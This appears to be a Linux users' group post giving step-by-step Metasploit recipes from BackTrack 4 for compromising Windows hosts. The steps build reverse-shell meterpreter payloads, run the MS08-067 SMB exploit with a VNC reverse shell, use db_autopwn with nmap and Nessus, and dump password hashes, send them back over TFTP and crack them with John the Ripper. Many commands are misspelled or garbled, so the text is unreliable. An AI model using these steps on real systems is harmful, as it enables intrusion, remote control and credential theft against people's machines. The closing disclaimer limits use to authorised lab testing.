Okay, you guys, here's a couple of HowTo's for basic Metasploit from Backtrack4R1: 0) Quick Windows MultiHandler Reverse Shell startx /etc/init.d/./wicd start {check your wireless or wired connection is working} mfspayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 >/root/payload.exe optimize /root/putty.exe (for Windows target) msfconsole mfs> use exploit/multihander mfs> set PAYLOAD windows/meterpreter/reverse_tcp mfs> show options mfs> set RHOST (local host ip) mfs> shell go mfsconsole > migrate example msfconsole > migrate 256 mfs> show explore mfs> use name (from show explore) mfs> set PAYLOAD mfs> set RHOST mfs> set LHOST 1) Nmap Mssql 2000 nmap -sT -0 nmap -sV mfsconsole show exploits cut and paste with your mouse highlight use mssql2000_resolution set PAYLOAD win32_bind_meterpreter show options set RHOST (target) exploit help execute -n Process execute -f file execute -f cmd -c interact 1 ipconfig see Menu---->System-->MISC--->TFTPD Server Start On your Backtrack Linux shell: cd /pentest/windows-binaries/tools ls cp PwDmp4.dll /tmp/PwDmp4.exe cd /pentest/password/dictionaries ls cp wordlist.txt.gz /tmp/wordlist.txt tftp -i get PwDump4.dll (or exe) tftp -i get nc,exe pwDmp4.exe pwDmp4.exe \l \o:pwdmp4.txt tftp (our ip) put pwdmp4.txt cat pwdmp4.txt john pwdmp4.txt john -show pwdmp4.txt john -w:wordlist.txt -f:NT pwdmp4.txt nc -L -p telnet victim - login as Administrator with password 2) Quick VNC using Autopwn mfsconsole db_create foo db_nmap db_autopwn -h db_autopwn -p -e sessions -i 1 sysinfo run vnc_oneport 3) Quick SMB (use another exploit if you like) & VNC Reverse Shell mfsconsole use windows/smb/ms08_067_netapi show options set PAYLOAD windows/vncinject/reverse_tcp show options set RHOST show options set LHOST exploit 4) Example using Nessus Plugins and db_autopwn apt-get install nessusd nessus nessusd (takes about 10 minutes to start) cd /pentest/exploits/framework3 svn update ./mfsconsole ./nessus Start a scan and Generate a Report mfs> help mfs> db_create /root/database/foobar.db mfs> db_import Cross reference from report showing exploit port open and probable reported from Nessus Save output of the Nessus report to /root/nessus.nbe mfs> db_import_nessus_nbe /root/nessus.nbe mfs> db_autopwn -p -e Viola! * **DISCLAIMER: The use of Backtrack4R2 is advocated in pentest laboratories only and for fully qualified professionals after written Corporate approval. We do not advocate "cracking" and prefer the definition hackerin it's original term meaning those who reverse engineer and creatively evaluate to learn. We do not advocate "learning to hack"; instead hacking to learn.* Please come to our next PLUG Linux Security Team HackFest at Gangplankhq.com January 29, 2011, Noon until 3PM. -- (503) 754-4452 (623) 688-3392 http://www.obnosis.com